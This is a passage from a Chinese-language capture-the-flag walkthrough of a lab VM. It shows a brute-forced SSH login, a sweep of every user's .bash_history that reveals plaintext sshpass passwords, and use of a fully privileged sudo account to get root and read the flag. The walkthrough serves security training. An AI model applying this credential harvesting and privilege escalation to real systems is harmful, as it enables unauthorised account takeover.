[22][ssh] host: 192.168.56.134   login: zoe   password: plbkac
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-02 12:33:07

成功拿到一个ssh用户的凭据,尝试ssh登录并提权。

┌──(kali㉿kali)-[~/Work/stepler]
└─$ ssh zoe@192.168.56.134
The authenticity of host '192.168.56.134 (192.168.56.134)' can't be established.
ED25519 key fingerprint is SHA256:eKqLSFHjJECXJ3AvqDaqSI9kP+EbRmhDaNZGyOrlZ2A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.134' (ED25519) to the list of known hosts.
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
zoe@192.168.56.134's password:
Welcome back!


zoe@red:~$ whoami
zoe
zoe@red:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for zoe:
Sorry, user zoe may not run sudo on red.
zoe@red:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root   test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root   test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root   test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
zoe@red:~$ ls -al
total 28
drwxr-xr-x  3 zoe  zoe  4096 May  3 01:27 .
drwxr-xr-x 32 root root 4096 Jun  4  2016 ..
-rw-r--r--  1 root root    9 Jun  5  2016 .bash_history
-rw-r--r--  1 zoe  zoe   220 Sep  1  2015 .bash_logout
-rw-r--r--  1 zoe  zoe  3771 Sep  1  2015 .bashrc
drwx------  2 zoe  zoe  4096 May  3 01:27 .cache
-rw-r--r--  1 zoe  zoe   675 Sep  1  2015 .profile
zoe@red:/home$ ls
AParnell  CJoo  DSwanger  elly        IChadwick  JBare  JKanode  kai     LSolum2  mel    NATHAN  RNunemaker  SHAY       SStroud  www
CCeaser   Drew  Eeth      ETollefson  jamie      jess   JLipps   LSolum  MBassin  MFrei  peter   Sam         SHayslett  Taylor   zoe

成功登录,但没有sudo权限和计划任务可用于提权(暂时不考虑内核提权),上级用户目录中存在大量本地用户;

经过查找发现各用户目录均可访问,大多存在.bash_history文件,可以都看看里面是否存在可用信息:

zoe@red:/home$ cat ./*/.bash_history
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
top
ps aux
exit
exit
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
whoami
exit
exit
exit
exit
exit
cat: ./peter/.bash_history: Permission denied
exit
exit
exit
exit
exit
exit
id
top
exit

可用看到存在其他账户的登录凭据。

PS:需要说明的是在运维中为了方便操作,有些运维人员会使用sshpass将用户名和密码明文写在一行进行登录,这样会更快,但也不安全,会在历史中记录明文凭据。

使用新的凭据登录另外两个账户:

JKanode@red:~$ whoami
JKanode
JKanode@red:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for JKanode:
Sorry, user JKanode may not run sudo on red.

peter@red:~$ whoami
peter
peter@red:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter:
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL

可以看到peter账户拥有全部sudo权限,可以进行提权获得root权限。

提权&获取flag

通过sudo获取root权限:

peter@red:~$ sudo -i
➜  ~ whoami
root
➜  ~ ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
➜  ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

成功提权并获取flag。

总结

  • 在进行渗透的时候信息搜集非常重要,得到的任何可能是人名的都可以进行记录,保存后不管是后续的密码喷洒还是弱口令都能将测试范围缩小;
  • 在进行cli的web服务访问时出现无法访问等问题,可以尝试将证书校验跳过,基本都有相关参数。
posted @ 2026-05-03 00:55  shinianyunyan  阅读(4)  评论(0)    收藏  举报